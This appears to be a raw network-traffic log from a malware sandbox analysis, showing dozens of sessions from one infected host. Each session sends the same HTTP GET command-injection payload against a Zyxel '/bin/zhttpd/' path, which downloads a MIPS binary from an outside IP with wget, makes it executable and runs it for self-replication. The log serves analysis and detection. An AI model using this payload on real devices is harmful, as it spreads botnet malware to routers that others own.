                                            Feb 2, 2024 06:21:02.434753895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1746192.168.2.154273253.89.211.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434786081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1747192.168.2.155152043.201.107.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434812069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1748192.168.2.1552138110.22.159.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434863091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1749192.168.2.1557990158.234.71.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434883118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1750192.168.2.1554864153.85.78.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434916019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1751192.168.2.1550492107.35.200.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434979916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1752192.168.2.154787842.205.13.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435008049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1753192.168.2.1545282104.131.148.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435043097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1754192.168.2.1556272180.70.30.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435071945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1755192.168.2.1560092124.1.201.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435117960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1756192.168.2.1557220125.132.17.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435163975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1757192.168.2.154135649.193.97.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435213089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1758192.168.2.1534306171.135.255.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435250998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1759192.168.2.154676873.148.120.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435297012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1760192.168.2.1560944195.200.88.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435327053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1761192.168.2.155903272.244.115.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435376883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1762192.168.2.154484063.55.37.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435422897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1763192.168.2.1546308165.45.84.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435448885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1764192.168.2.1548076141.127.105.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435501099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1765192.168.2.1534712188.253.27.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435540915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1766192.168.2.155232017.89.215.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435571909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1767192.168.2.1547600147.14.167.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435604095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1768192.168.2.154076623.58.138.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435630083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1769192.168.2.1549524159.143.78.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435681105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1770192.168.2.1555966126.255.16.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435717106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1771192.168.2.1542582163.225.204.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435739994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1772192.168.2.1545174105.50.83.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435780048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1773192.168.2.154186839.247.151.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435828924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1774192.168.2.1556538136.201.153.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435854912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1775192.168.2.1546928221.19.154.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435900927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1776192.168.2.1554276165.29.88.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435935974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1777192.168.2.1553844131.55.40.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.435976982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1778192.168.2.1539840205.77.23.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436007023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1779192.168.2.155561013.230.67.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436033010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1780192.168.2.155728848.167.90.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436085939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1781192.168.2.154344635.214.33.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436103106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1782192.168.2.1546188178.39.11.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436147928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1783192.168.2.1539244222.105.62.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436208010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1784192.168.2.1553760121.18.77.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436237097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1785192.168.2.153363654.248.159.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436264992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1786192.168.2.154738253.246.132.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436311960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1787192.168.2.1547440114.246.7.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436332941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1788192.168.2.153402446.1.107.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436391115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1789192.168.2.1552676136.178.4.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436414003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1790192.168.2.154540467.97.185.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436454058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1791192.168.2.15444404.99.49.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436460018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1792192.168.2.153944217.22.154.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436511040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1793192.168.2.154634045.229.63.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436547041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1794192.168.2.1537176188.74.16.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436594963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1795192.168.2.1557114177.91.123.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436625957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1796192.168.2.1546932223.76.155.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436650991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1797192.168.2.1556578203.177.108.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436700106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1798192.168.2.1553148106.189.85.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436748981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1799192.168.2.1549374118.9.149.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436770916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1800192.168.2.1549700139.105.195.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436805964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1801192.168.2.1546800151.107.244.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436841011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1802192.168.2.1550016130.44.114.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436887026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1803192.168.2.1537996141.44.86.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436918974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1804192.168.2.1559920163.151.34.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436949968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1805192.168.2.155899259.246.184.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.436973095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1806192.168.2.1538094159.104.37.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437005997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1807192.168.2.155472023.155.81.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437040091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1808192.168.2.1558250210.81.207.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437067032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1809192.168.2.1532948123.153.111.34443
                                            TimestampBytes transferredDirectionData
